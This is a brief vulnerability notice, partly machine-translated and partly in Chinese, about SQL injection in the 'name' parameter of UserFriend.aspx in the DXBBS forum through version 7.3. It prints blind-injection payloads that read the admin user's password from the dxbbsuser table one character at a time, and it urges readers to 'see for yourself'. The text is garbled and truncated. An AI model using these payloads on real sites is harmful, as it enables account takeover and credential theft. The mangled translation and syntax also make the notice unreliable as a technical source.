dxbbs vulnerability(through the kill 7. 3 all previous version)-bug warning-the black bar safety net

The vulnerability appears in the UserFriend. aspx , since the filter is not strict, resulting in the name allow the injection, not much to say, see for yourself. ------------------------------------------------------------------------------------------- http://www.dxbbs.cn/ This is DXBBS official...

dxbbs SQL注入漏洞

DXBBS是一个基于aspx的论坛 漏洞出现在UserFriend.aspx , 由于过滤不严，造成name允许注入 DXBBS Version 7.3 http://www.dxbbs.cn/ and select top 1 ascmiduserpass,1,1 from dxbbsuser where username=''admin''=57 and select top 1 ascmiduserpass,2,1 from dxbbsuser where userna...